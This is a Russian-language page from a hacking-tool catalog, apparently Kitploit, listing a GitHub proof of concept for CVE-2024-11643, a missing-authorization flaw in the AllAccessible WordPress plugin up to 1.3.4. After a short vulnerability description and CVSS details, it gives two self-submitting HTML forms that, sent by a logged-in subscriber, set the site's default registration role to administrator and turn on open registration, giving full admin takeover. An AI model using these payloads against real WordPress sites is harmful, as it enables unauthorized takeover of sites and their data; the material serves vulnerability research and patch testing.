Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2024-11643 — Доступность от AllAccessible <= 1.3.4 - Отсутствие авторизации для аутентифицированных (Подписчик+) произвольное обновление параметров. | Kitploit
Инструменты/GitHubGitHub/randomrobbiebf/cve-2024-11643
Аутентификация и авторизацияПовышение привилегийАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на Проникновение
GitHubrandomrobbiebf/cve-2024-11643

CVE-2024-11643

Доступность от AllAccessible <= 1.3.4 - Отсутствие авторизации для аутентифицированных (Подписчик+) произвольное обновление параметров.

Репозиторий
1 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2024-11643

Уязвимость Accessibility от AllAccessible <= 1.3.4 - Отсутствие авторизации для аутентифицированных пользователей (Подписчик+) с возможностью произвольного обновления опций

Описание

Плагин Accessibility от AllAccessible для WordPress уязвим к несанкционированной модификации данных, что может привести к эскалации привилегий из-за отсутствия проверки прав доступа в функции 'AllAccessible_save_settings' во всех версиях до 1.3.4 включительно. Это позволяет аутентифицированным злоумышленникам, имеющим уровень доступа Подписчик и выше, обновлять произвольные опции на сайте WordPress. Эту уязвимость можно использовать для изменения роли по умолчанию при регистрации на администратора и включения регистрации пользователей, чтобы злоумышленники могли получить административный доступ к уязвимому сайту.

Детали

  • Тип: плагин
  • Затронутая версия: 1.3.4
  • Оценка CVSS: 8.8
  • Рейтинг CVSS: Высокий
  • Вектор CVSS: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
  • CVE: CVE-2024-11643
  • Статус: Активен

POC

Войдите как подписчик, затем используйте эти формы, чтобы установить роль администратора по умолчанию, а вторую — для регистрации пользователей.

Роль администратора по умолчанию

root@kitploit:~
<html>
  <body>
    <form action="https://wp-dev.ddev.site/wp-admin/admin-ajax.php" method="POST">
      <input type="hidden" name="action" value="AllAccessible&#95;save&#95;settings" />
      <input type="hidden" name="opt&#95;name" value="default&#95;role" />
      <input type="hidden" name="opt&#95;value" value="administrator" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      history.pushState('', '', '/');
      document.forms[0].submit();
    </script>
  </body>
</html>

Пользователи могут регистрироваться

root@kitploit:~
<html>
  <body>
    <form action="https://wp-dev.ddev.site/wp-admin/admin-ajax.php" method="POST">
      <input type="hidden" name="action" value="AllAccessible&#95;save&#95;settings" />
      <input type="hidden" name="opt&#95;name" value="users&#95;can&#95;register" />
      <input type="hidden" name="opt&#95;value" value="1" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      history.pushState('', '', '/');
      document.forms[0].submit();
    </script>
  </body>
</html>
Скачать инструмент